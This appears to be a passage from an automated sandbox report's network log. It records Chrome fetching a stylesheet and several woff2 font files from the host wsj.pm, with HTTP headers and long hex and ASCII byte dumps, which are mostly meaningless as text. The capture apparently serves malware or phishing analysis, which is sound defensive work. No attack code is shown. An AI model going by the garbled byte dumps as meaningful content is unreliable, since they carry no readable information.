                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: f7 ac 83 dc 20 86 c2 e5 63 e6 75 ab 62 22 78 42 5e 5a 9f c2 6a 6a a8 38 80 e4 9d e2 49 41 d9 78 67 94 c3 5c b5 89 21 a3 78 42 7b 48 a2 d6 95 4c ae 06 bb 2f 62 fc 3c 22 7c 87 3a d8 28 90 8f c7 02 26 a6 02 3e 33 38 c3 c5 a5 4d e8 3b 68 a4 6d da f9 0c 3a 26 7e b5 82 a9 98 a5 38 15 f6 9a 23 45 81 e4 22 5c 1c b8 8b 5b fa 14 ce 58 c4 4b 08 e4 65 c4 2f 34 8c c0 36 ef 9a c3 9d 5b 1a fc c2 1f dd d3 be 38 09 d4 4c 4c 15 dd 81 60 7d 20 11 7f ef f9 bd fa 92 b7 77 53 58 50 3d 06 49 46 c6 50 91 81 05 6c 15 84 69 f9 39 19 93 bb 5f 20 62 c0 b7 df 02 03 e7 e0 0c 87 3f 04 f0 5a ac 2f 96 50 51 67 11 7e 09 09 7e 88 f2 36 f8 50 c4 52 44 e3 de bc e7 f5 84 39 6d 78 a9 4d d2 25 67 ca 67 31 55 0e 3f 89 3f 75 eb 5c 6a d9 05 c0 fb e1 5a 3b 55 ee 88 e3 d1 f8 b4 fc ee 43 97 69 c8 7f
                                                                                                                Data Ascii: cub"xB^Zjj8IAxg\!xB{HL/b<"|:(&>38M;hm:&~8#E"\[XKe/46[8LL`} wSXP=IFPli9_ b?Z/PQg~~6PRD9mxM%gg1U??u\jZ;UCi
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 3f b8 18 a6 b3 c8 92 29 2f a2 eb 77 ff 5d 98 1d f0 69 49 59 9a 81 0a 09 cc 6b a2 3d 81 be 2c 97 66 82 07 32 03 e5 5c bd c8 10 ae 39 e6 79 44 71 38 4f fc eb b0 0c 09 9e 70 09 da ac 47 6e 3a b4 ae 15 b4 2c 6d fc f9 b0 63 aa b2 88 0a fa fc 81 94 9c fb 29 a1 ab 90 51 f2 2d 55 63 57 58 4b dd 35 16 34 2f ed 2f 37 2b 53 2a 94 84 78 f4 84 6d 83 d7 f3 61 6d 24 39 0c 97 a4 2c 54 d0 ff ad 43 12 4b df 97 70 3b 87 55 b1 37 db 50 14 d4 48 f9 34 6a c4 de 70 ce ab c3 3c 6d 86 4e 35 fb 76 8f 95 ca 5d fe 31 20 d5 06 97 d2 ae 06 1f 82 1e 97 ce db 3c 34 f4 de 7a 00 6f a7 5e de 1c 76 e3 ba 86 cb 78 b9 09 61 ff b5 8a 88 0b 94 50 df 81 6e 8c 22 02 ba 8f d2 e7 8c 4c 01 75 05 88 36 c2 8d cd c5 36 c7 75 cb fc 92 9a 65 61 18 7f 0d 4e 3c c1 ab 8c 60 e8 8d 83 c0 ec d9 36 0e 4c 9c 1a
                                                                                                                Data Ascii: ?)/w]iIYk=,f2\9yDq8OpGn:,mc)Q-UcWXK54//7+S*xmam$9,TCKp;U7PH4jp<mN5v]1 <4zo^vxaPn"Lu66ueaN<`6L
                                                                                                                2024-04-25 14:58:18 UTC6956INData Raw: 74 92 c1 76 6c aa 91 9d b8 8e cc 7c 25 7a 38 ba 4f 57 24 90 6f 9d fc b7 8d 29 8f e7 18 ec e0 a6 5e 70 13 10 6d 6a 05 0c b0 10 91 5d 80 63 e2 e1 5e 85 c2 67 a7 d6 32 00 32 e0 0c 67 09 9c db 9e 78 c2 03 ba 9b df a0 5c d5 d4 19 09 91 9e ee 55 18 92 54 2b 61 93 87 7e 17 5e ce 91 75 d4 38 df da 48 92 7a a7 76 a8 55 42 4b 70 24 f2 7a 07 6d bb 23 4d 60 8e df a0 2b 5c 3c 3f 96 a4 ec 06 51 dd 63 a8 42 3b 5a fd bb 42 1b 87 23 fc b4 42 e7 95 71 3e 19 1b 29 83 48 da 2d 7d 19 4e 86 92 93 e2 73 c9 b4 3c 85 f2 90 fb 95 14 1b 82 63 a6 ba e7 c9 59 78 14 ae c9 42 f5 94 d5 57 29 43 ed 8b b2 1d b8 e8 cb 5c d4 13 24 97 01 cf d9 d2 de 8d 7a 12 94 78 ec 09 b8 37 81 f4 38 35 77 02 e9 2b be 98 16 1a 94 14 9f d4 b4 e1 1d d2 a3 42 50 02 b9 f8 44 04 d7 2b fe 94 85 47 6f 90 55 6c d7
                                                                                                                Data Ascii: tvl|%z8OW$o)^pmj]c^g22gx\UT+a~^u8HzvUBKp$zm#M`+\<?QcB;ZB#Bq>)H-}Ns<cYxBW)C\$zx785w+BPD+GoUl


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.1749724103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC520OUTGET /style.css HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: style
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC271INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:36:31 GMT
                                                                                                                ETag: "68a-6164944164dc0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1674
                                                                                                                Vary: Accept-Encoding
                                                                                                                Connection: close
                                                                                                                Content-Type: text/css
                                                                                                                2024-04-25 14:58:18 UTC1674INData Raw: 2e 63 65 6e 74 65 72 65 64 2d 6c 69 6e 6b 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 31 31 31 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 74 65 78 74 2d
                                                                                                                Data Ascii: .centered-link { position: absolute; display: flex; align-items: center; justify-content: center; font-size: 22px; z-index: 1111; width: 100%; height: 100%; font-weight: 700; text-align: center; text-


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.1749725103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC556OUTGET /fonts/woffs/retina/RetinaNarr-Book.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:42 GMT
                                                                                                                ETag: "ba14-60eae3c7a2480"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47636
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 ba 14 00 12 00 00 00 02 39 48 00 00 b8 e9 00 01 00 00 00 00 b9 50 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 36 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 85 ed 28 85 b4 2c 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8f 30 07 b1 0c 0c 81 23 5b 96 15 92 a9 9b 6c f3 79 f7 c7 35 22 aa c8 2e d9 5d b7 09 9e 8d a9 a2 d5 30 cf fa 00 b7 0d da 5e 8c 9e 2f 38 55 0d db a6 d3 f4 6e 07 26 67 a5 ff 64 67 ff ff ff ff ff ff bf 30 99 88 4d 4f 72 22 d9 f2 13 42 7e fa 6c d0 00 2d b4 19 5d 37 08 d4 8b 06 8b 9e a6 1c 50 4a b3 23 ad d9 be eb 89 d9 30 5a 87 a9 9d 97 e1 30 f9 d0 c6 27 d2 a1 3c 23 31 7d 2c d8 41 88 8a 62 d6 05 99 34 8c 60 62 14 2a dc 8b 72 2a fc 10 0f a4 65 67 08 5e 7f 51 ad e6 77 e5 9d a1 a5 c7 c1 07
                                                                                                                Data Ascii: wOF29HP:b6\`x(,6$nz 0#[ly5".]0^/8Un&gdg0MOr"B~l-]7PJ#0Z0'<#1},Ab4`b*r*eg^Qw
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: a6 81 ec ad 40 85 5e 8b 07 2d 02 2c 68 bd 4a 9b 64 89 81 0c 4f b5 36 72 9f 5a 00 6e ab fd 08 18 85 6b 87 bc ae a0 8d e0 4b bb 68 2c 10 af 9f b7 8e 29 66 b8 8b 06 df 78 d8 9f 8d 47 cc 74 82 d4 31 78 e3 22 ec 96 17 4c be 58 cb 1c 8c 7e 9b 87 b9 2e 43 d4 04 35 d8 b3 67 3d 71 64 d9 b8 9f 34 e5 69 80 8f c6 59 13 68 58 0f 85 97 15 52 fc 93 7b 09 ae 0c 14 00 11 e7 a4 be ca 33 13 cc 95 11 0f a5 c7 17 18 7a 55 97 b8 67 69 09 f5 9e 80 a4 21 7b f3 a7 fd 84 70 50 4b 55 2e 5b 16 b9 20 af 87 8d b6 9f 2f 91 2b 11 70 a0 99 29 16 25 d1 41 54 96 01 ee 71 21 8a 59 9d 76 95 38 18 66 57 f4 8b 34 f2 a8 1e c4 41 45 9a a8 e7 50 40 84 05 a8 a5 4b 5c 85 c2 3a bf 9d ea 1c b9 69 5c 36 31 6f bd 98 ff 01 cb 40 f7 8d d3 93 32 b1 34 0b d0 68 3b 0f c5 a0 16 59 b1 a6 b1 aa 2e 82 87 e8 dc
                                                                                                                Data Ascii: @^-,hJdO6rZnkKh,)fxGt1x"LX~.C5g=qd4iYhXR{3zUgi!{pPKU.[ /+p)%ATq!Yv8fW4AEP@K\:i\61o@24h;Y.
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: e0 e3 a3 67 c9 40 b2 58 3b 6d 2f 6b 3e 54 a5 67 47 31 ae ee 37 96 9f 73 95 1a 39 bd 82 d8 c5 79 a7 2d df d5 05 dd 9f d4 dd 85 d4 90 e5 70 e2 5b 1f f2 58 80 ac c5 1c 64 b1 60 c9 72 92 b4 e9 07 e4 f9 6a 46 11 34 5f f1 95 d1 49 9a b0 9c 8f 6a 3e cb 79 a0 5f 35 a5 69 61 38 dd a6 12 51 33 f5 4b 49 3f 3e 74 69 96 40 ed 36 25 e6 ce a8 21 4b 55 62 16 1d 87 df 24 71 28 e4 6f 40 0d 38 0c f8 e8 62 c8 46 2e 72 34 4b d4 05 25 90 93 0d 7d e2 23 fb 6c 8c 29 51 84 34 8a 2c 49 bc 9a bc 20 ec a6 be c9 47 95 92 cc c5 b4 a6 1f 06 3c 22 f4 cd 0f c6 aa 6c 24 5a 50 1c 6a aa c3 20 15 a0 70 02 93 09 54 0b b9 16 f2 b8 e4 98 f6 fe 35 01 f8 fa 94 a8 0c 90 da 86 fd c2 3e 06 49 c8 e2 ad 2d f7 ac 1c c7 f6 40 13 88 fb e4 a3 08 93 84 4f 03 80 8c ca 61 dc b6 31 aa 7c 27 f6 ea 6e 50 43 06
                                                                                                                Data Ascii: g@X;m/k>TgG17s9y-p[Xd`rjF4_Ij>y_5ia8Q3KI?>ti@6%!KUb$q(o@8bF.r4K%}#l)Q4,I G<"l$ZPj pT5>I-@Oa1|'nPC
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: e3 c3 9d 40 10 04 7a 7c d2 33 15 e5 bf 70 6d 25 61 a2 94 fa 37 63 7e 5b b1 88 ce a1 a5 a5 a5 ca f9 8c 72 1c 0d 47 22 49 d4 6a 7e 46 c6 24 6e c4 bd 36 c7 5c 38 af ba d4 de ab 46 91 86 56 52 c6 99 5a 9b 25 ef dd 78 22 ff 4b 65 4d a1 36 d7 7a 2c 79 4b f4 4e 0d 27 87 4c 67 55 17 a3 10 21 23 3f c1 29 49 d9 e9 16 b2 48 fb 2a 26 01 37 88 f2 0c c8 e6 f8 0d 90 63 57 b6 16 7d be 13 e6 f5 52 75 e0 4c 80 dd 71 36 61 bf 6d f0 4f 57 88 6a bd 5b e5 c6 18 b7 97 9a 4a 31 43 07 7a ea d2 0c 75 18 d5 81 96 ba 64 4b dd 83 e6 ba 14 4b 1d 8b ca 4f eb a9 ab 40 de e4 41 f1 9d 33 27 57 8e c6 20 d2 f8 ca e3 f1 b9 a6 7a 31 9f 9b 90 76 30 4d c0 13 04 7d 90 57 8f 0e 72 52 61 fe 07 cc 60 a6 f1 61 54 67 10 83 55 e9 ef 73 7c 57 a8 12 15 38 b6 b8 83 00 82 f6 80 e3 9d 13 24 35 1d cc 97 4c
                                                                                                                Data Ascii: @z|3pm%a7c~[rG"Ij~F$n6\8FVRZ%x"KeM6z,yKN'LgU!#?)IH*&7cW}RuLq6amOWj[J1CzudKKO@A3'W z1v0M}WrRa`aTgUs|W8$5L
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: a8 62 08 d0 35 7d 33 0a eb d6 56 b4 60 b4 e1 f9 57 b4 69 58 b5 df 6c 89 fc 8a b4 c2 63 47 9b ef 9c 23 13 a9 9b 9d 48 97 3c 4c 41 e7 b3 d0 03 9a e6 41 c2 a7 24 6a d7 f8 ce 68 92 e1 41 e1 93 03 75 49 72 8a 1d 24 60 2c d2 36 94 dd 9d ba 09 af 27 2a c8 25 df 32 88 2d 16 8c 8d 7b cd e6 3e 23 ce 7a bf cb 92 d0 33 41 64 7e 83 b3 9e 77 74 f2 5d 2c 92 2c 71 14 1b 06 5a fb 1d 99 74 d9 d4 c0 59 55 37 cc 14 22 e0 a1 f6 50 c2 b3 0f 41 44 37 64 a4 4d 78 92 4a 46 f8 0c 15 e7 1d 66 66 6c 98 0d 23 e3 51 61 eb 72 ea c3 55 bb 5f 21 c1 d9 35 f3 7d 95 ea e3 ee b2 3d 84 99 09 96 0f ad b4 cc 82 37 d5 82 b4 9b bc ec d4 3a 41 8c fd c9 3e 64 cd cf d1 f5 6d 33 ef f6 92 d7 1c fd e0 33 60 e4 92 6b e9 73 93 62 5e ee 49 4b cf e1 5b 06 b9 a6 2c 58 ed 30 4d 3c 17 f3 1e 53 1e a7 08 d7 ad
                                                                                                                Data Ascii: b5}3V`WiXlcG#H<LAA$jhAuIr$`,6'*%2-{>#z3Ad~wt],,qZtYU7"PAD7dMxJFffl#QarU_!5}=7:A>dm33`ksb^IK[,X0M<S
                                                                                                                2024-04-25 14:58:18 UTC7696INData Raw: 48 99 5c f4 7e 94 94 55 6b 1d cf 95 36 97 c6 c1 c2 b9 35 a0 12 da db 8e 13 33 b1 da bf 34 65 46 ce 36 bb 04 da 7e 70 77 9c c1 cb 40 04 f6 cd e9 60 38 ef 77 ec d1 08 c5 1d 92 65 7b 8f e7 15 3a af db 78 06 58 f9 31 57 cb 5f 52 a5 96 0f c3 1e 40 6b 23 2f b1 d9 d7 86 3b c9 13 69 f2 18 18 3b 42 11 47 eb 4e 26 a0 6a 5e 24 6d 78 77 da 9c 2b 5c 65 10 ef 9d 7b 79 47 78 85 54 90 c4 1c d6 4c b3 28 14 3f c5 ab 97 4f 0f a7 b7 f3 db f1 5c 4f 52 07 05 49 d2 45 12 4b 4b af 2a dd 0c a7 5c 5a 9a 36 dc e6 56 a9 48 25 41 0c d6 11 a7 36 ba 41 1a 54 55 22 12 bf 78 00 38 d8 0f d9 15 9e 11 83 9e a2 4d ec 92 6e 21 f9 b5 56 9a ba e8 6e a9 da 75 24 7e f1 64 19 05 85 57 9a 67 ed 4f e7 b3 64 45 5b 73 1c dd 82 60 82 03 96 0a 24 c6 8d f5 f9 8a a3 13 c5 5c c2 60 06 41 a8 78 09 2b c9 cd
                                                                                                                Data Ascii: H\~Uk6534eF6~pw@`8we{:xX1W_R@k#/;i;BGN&j^$mxw+\e{yGxTL(?O\ORIEKK*\Z6VH%A6ATU"x8Mn!Vnu$~dWgOdE[s`$\`Ax+


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.1749726103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC558OUTGET /fonts/woffs/retina/RetinaNarr-Medium.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:51 GMT
                                                                                                                ETag: "b884-60eae3d0378c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47236
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 b8 84 00 12 00 00 00 02 37 98 00 00 b7 58 00 01 00 00 00 00 b7 c0 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 30 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 85 ea 0c 85 b1 2c 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8f 24 07 b1 0c 0c 81 23 5b 04 14 92 09 d9 c6 6e 13 df 24 e5 ad 28 2a 9b 47 db 5e 88 ea e2 3c ee 0f 44 e7 ee 8d 54 7a b3 9c 03 7a df d5 9b d5 a8 6e cd b8 a0 bb 55 0a 13 01 03 c8 fe ff ff ff ff ff 7f 53 b2 88 b1 35 3b 07 b3 7b 1c 00 20 aa 0a 64 95 f6 5f f5 0f 31 77 0f c8 66 08 8d 4a 98 1c 6d 87 6c a2 ef 4c 98 28 43 f1 b1 29 4d 9e 0a 9a 16 59 31 6b 44 b6 79 c0 c1 7b 53 7a e4 91 4a 54 a2 12 95 2a 59 8e e6 74 b6 97 6a 9c 9f aa bb 4e ec a6 45 ad ec 7a cc 08 33 e4 96 4a 54 a2 52 ea d6 b0
                                                                                                                Data Ascii: wOF27X:b0\`x,6$nz $#[n$(*G^<DTzznUS5;{ d_1wfJmlL(C)MY1kDy{SzJT*YtjNEz3JTR
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 23 4f 4b ba f3 98 1b 7d 8f f3 46 17 b5 a5 ff 78 e2 ad 45 19 9b 52 a9 9e 24 a5 fc d4 c2 d5 f7 a9 be 55 a4 99 92 ae 4e 4d 7b d6 d3 67 da 24 09 d7 30 27 e7 1c 04 98 2d b9 d9 bc 6a c1 f0 83 14 e6 00 ef 84 8f 0f 61 88 98 a0 8f b7 0a 3a 0c 54 dc 1e fa 1b 48 9a ee f2 a1 e3 5c 03 50 b7 99 af e1 56 66 73 3c b9 09 1a fd f2 25 9b 4b eb e6 fd 52 c8 34 84 8c 10 e5 72 b0 69 8e 8f 75 09 61 2d 22 5e 6a 81 a8 c0 0a 4d da 1e 24 cf 21 45 8d 78 b2 9b 4b b8 70 27 c9 c4 e4 8d c9 91 9a b3 2c 4a 7f 6c d9 95 95 af d7 71 cb 46 8e cd 27 66 f1 ca 93 0f 1e 29 24 ca 49 e5 54 9f 9c ba 72 64 f0 b8 f1 1c 34 fe 4b 4b e5 66 11 be 7e 5d c3 93 66 7d d7 78 e6 ae fb 62 da cf 27 61 cf 64 d3 ba 45 ab e6 7d 76 d0 46 23 a3 b8 fd ae 5e a3 92 fd 6e 5d 7b 3f df 3b 13 65 e0 b4 8d 8e 70 e8 6e 31 66 9e
                                                                                                                Data Ascii: #OK}FxER$UNM{g$0'-ja:TH\PVfs<%KR4riua-"^jM$!ExKp',JlqF'f)$ITrd4KKf~]f}xb'adE}vF#^n]{?;epn1f
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: ac 97 a1 59 c6 fa 02 b0 47 af 7d 12 c7 9f ba a4 2b 42 1f f4 46 cf 7d 79 59 d7 f2 ab ec e4 a0 26 b6 98 34 f9 ad 0e 8d 7a c2 85 ea a8 f4 b3 9a fa 9e ed 25 d5 7d 76 d0 6c 20 44 27 73 a8 67 3a 84 58 83 f8 45 47 5f 62 6a 2f 2d cd 49 54 28 3f 17 95 59 4d d9 58 2e ea 76 4b 1f 19 98 26 d9 dc af 59 55 b1 6e 22 f4 19 9d 8c e8 6e 4e b5 55 8f 6a d3 4e 2b 05 80 10 24 26 cf 8e d2 b8 91 88 8c 11 b7 11 64 04 a1 1d 17 b1 bb 54 76 cd 0a 91 1e 0f 47 20 c8 31 af 6e 25 ee 70 f7 c2 a7 06 12 3d f9 e4 49 df 36 c2 40 10 c4 68 22 b3 5d 6b 8c ea 63 d7 52 7b 25 a0 21 29 b7 1b 1d 81 91 83 f2 4b c1 4d 82 7e 9d a6 90 14 c8 e6 35 80 6c 3a 5e f2 a9 d5 54 7e 79 cf 86 7f 9b 62 fa 43 18 c4 24 9d c6 cf 67 5c 04 83 50 a3 7c ae 64 10 d0 80 97 95 4c b7 7b ae 73 4c de 61 0e af a8 e2 ed 08 b4 01
                                                                                                                Data Ascii: YG}+BF}yY&4z%}vl D'sg:XEG_bj/-IT(?YMX.vK&YUn"nNUjN+$&dTvG 1n%p=I6@h"]kcR{%!)KM~5l:^T~ybC$g\P|dL{sLa
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: fe 99 4d a8 1b 43 3f 67 a3 90 db 1c 16 c7 f7 92 64 50 d6 18 76 07 81 49 aa 20 12 2b 48 8b 77 1c 71 3d 6c 01 1c ee 0f 83 f9 c3 e1 0b b2 31 bd 91 6b ee d9 e2 b7 6e 8c 49 5c ed 2c f2 bb 49 4a 96 7d b7 d7 85 cc e8 47 a1 36 0b e3 91 7d db c3 42 99 e0 d8 93 64 42 1a 01 95 41 c0 b8 08 87 62 33 e7 5e fe 93 f9 cb 1c 7b 18 9f 9b a0 46 e0 47 9e 5f d9 9f 43 fd 9a 8d 43 4d 1a 6d e6 5d 52 59 72 72 19 69 59 4a 5c 05 8b 81 dd 55 14 1e 86 43 75 39 e4 1c 07 b1 b7 c4 52 f2 bd e0 d9 69 73 f2 a4 c3 08 60 23 cc 0a 4d c7 98 cb 2c ac 44 36 bb df d2 7f a1 a7 9d 1d ff b1 7e 65 d9 8b c9 4d 61 e9 70 d9 0a ae 23 62 2b 3c b8 22 0f 23 62 31 99 82 3c 6c 5e 45 5c 68 da 49 c5 e9 d8 47 a2 36 b7 ab ee b7 27 0b df 40 29 5c 04 22 e7 ea 1f 89 cb 43 43 42 80 40 33 bb 1f 47 03 f9 75 c4 87 75 00
                                                                                                                Data Ascii: MC?gdPvI +Hwq=l1knI\,IJ}G6}BdBAb3^{FG_CCMm]RYrriYJ\UCu9Ris`#M,D6~eMap#b+<"#b1<l^E\hIG6'@)\"CCB@3Guu
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 67 01 b4 c4 ac ad 76 6d 5b 9a 9a d7 f6 96 1c 31 6a c6 86 42 ed 4a dd 54 3b 28 27 d9 7f 7f 97 4c 6d 48 3f 75 fe fa f1 23 c5 79 1a 87 55 70 65 8c 78 ef d3 f7 fc 16 82 7a d6 e0 2e cc 20 6d 0d e7 1d 91 9e 20 b5 6d dc a6 f7 ed 96 c1 40 71 fd 52 8a 45 4b 9f b7 8c a0 70 3d 4e 1f 93 ea 4e ce 73 ee 40 dc e5 3e b3 0e ad 6b f7 62 b8 7f 6b 7f 3d dd 65 65 91 b3 12 fc d0 e3 29 a2 1a 25 6a d9 a6 66 8a eb 03 ce 0a 9a 97 56 ae 49 7d e1 ad a7 2b f7 d0 61 a8 c0 45 1b c1 fe 92 a3 c7 5f 9a 5d a1 85 dd 55 47 6c 88 be 55 9a 5a c3 89 ee a2 db c3 3c 0d 5d ab ea b5 59 db 9d dc 5d 17 1e 7f 00 b9 2d 43 9b eb c9 5a cd 41 c8 71 63 79 c0 9d 86 de 5b 0f b4 43 3d f4 f5 f3 6d d1 91 ba c7 fe f1 55 08 6b 1e 8a 8a f5 03 c8 96 07 76 1f 2d c1 c9 8c 82 ea f7 af a1 ed 83 1d 4b b3 2c 0c ef 93 b2
                                                                                                                Data Ascii: gvm[1jBJT;('LmH?u#yUpexz. m m@qREKp=NNs@>kbk=ee)%jfVI}+aE_]UGlUZ<]Y]-CZAqcy[C=mUkv-K,
                                                                                                                2024-04-25 14:58:19 UTC7296INData Raw: ca aa a5 1f 6b 1e 3e 11 25 8b ef 11 82 b7 d1 09 91 cf 93 62 ac 63 fd f8 ec 20 85 af 1a 78 ef 83 e3 ae ba 2c 85 3c 19 52 d3 74 5c d9 11 92 a6 e3 90 86 bd 71 0d e5 c5 af 41 91 7b 94 22 10 4c cc 2d f8 55 e6 b7 b9 87 11 0a 90 26 b8 3b 75 dd 9d 6f 36 ac 66 61 18 bf 4a 54 52 f1 a0 64 7c 1c 72 14 5d d6 85 2d 3c b1 b7 c9 00 9f 1b d0 dd 35 c0 0f 5a ae 95 10 5e d0 28 a9 b8 31 b0 23 89 4e 37 cf cc c0 97 a9 6b c7 cc 97 56 89 f3 d0 dd 35 1b 1b 91 ac 84 0e 40 35 b6 c4 67 4d c2 67 92 d8 33 0c 44 89 76 fd 2d c3 8e 0d 4b 20 ca ae 75 70 43 2e d5 7e 2b ca 95 4b e0 ca 6b 25 91 79 57 5c a7 80 b4 3a 8f 29 97 a9 74 06 52 a0 37 38 75 5d a2 20 32 25 a4 55 0c 9e 56 a1 d2 08 1f 14 89 0d 2c c2 b0 fc d0 e5 c2 f6 1a f1 d2 26 f7 1a 03 ef a7 05 6c 09 7c 66 a2 c4 dd 74 26 76 6f e4 06 9b
                                                                                                                Data Ascii: k>%bc x,<Rt\qA{"L-U&;uo6faJTRd|r]-<5Z^(1#N7kV5@5gMg3Dv-K upC.~+Kk%yW\:)tR78u] 2%UV,&l|ft&vo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.1749727103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC556OUTGET /fonts/woffs/retina/RetinaNarr-Bold.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
